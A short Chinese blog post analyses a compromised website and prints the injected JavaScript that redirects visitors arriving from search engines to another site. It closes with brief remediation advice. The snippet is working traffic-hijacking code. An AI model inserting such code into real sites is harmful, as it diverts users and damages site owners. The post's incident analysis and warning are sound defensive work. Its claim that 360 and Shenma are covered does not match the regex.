分享一段流量劫持JS代码

今天帮一个朋友分析了一个网站，症状是从搜索引擎访问，网站会跳转到另一个网站去，直接输入网址，网站没有发生跳转，通过一系列的分析发现罪魁祸首隐藏在js文件里面，下面是代码：

var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referrer;
if(regexp.test(where))
{
window.location.href='https://www.sobuer.com'
}

从日志上来看，是有人通过网站的漏洞在网站本身的js文件里面增加了一段代码，而这段代码会判断流量是否是从这些搜索引擎来的，如果是从搜索引擎来的，直接跳转到指定的网站，如果不是从这些搜索引擎来的，就不发生跳转，上面的代码中科院发现该黑客劫持了来自搜狗、百度、360、神马、必应、谷歌等搜索引擎的流量，如果你的网站发现类似的代码千万要小心。

解决办法：修复网站漏洞，删除可疑代码，问题即可得到解决。